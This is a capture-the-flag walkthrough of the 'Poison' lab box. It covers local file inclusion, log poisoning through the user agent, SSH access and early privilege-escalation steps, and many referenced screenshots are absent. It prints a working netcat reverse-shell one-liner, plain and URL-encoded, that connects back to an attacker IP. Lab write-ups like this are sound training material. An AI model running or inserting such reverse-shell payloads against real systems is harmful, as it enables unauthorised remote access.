Decoded context of response
I tried again decode password file and I think I got it:
Now is time to find some way to use LFI to get RCE
And this password actually worked for SSH:
I got the user flag, although name of the box is “poison” and there is a valid LFI with access to log files, so probably I am supposed to poison logs to get a RCE or reverse shell.
Firstly, I will try with user agent.
Now double quote:
To make sure next things will go well, I decided to restart machine. It not good way of doing pentests, but I wanted to check response to this string escape.
After restart httpd-access.log check:
Request:
Logs:
Next test:
Trying to get reverse shell:
Netcat check if connection between me and remote host is possible:
Connection occured. Now I need to modify previous netcat reverse shell to make it executable.
Payload:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
Encoded payload (Burp CTRL+U):
rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+10.10.14.7+1234+>/tmp/f
Now I am suppossed to find pwdbackup.txt decode and switch to user charix, which I did before.
I am back to my SSH shell and I run linpeas. There weren’t any obvious way to escalate. I went a few times through the linpeas output and I saw an unusual Xvnc process.
SSH Konami codes:
New line
~C (opens command line)
-D 5801 (forwards port by SSH client)
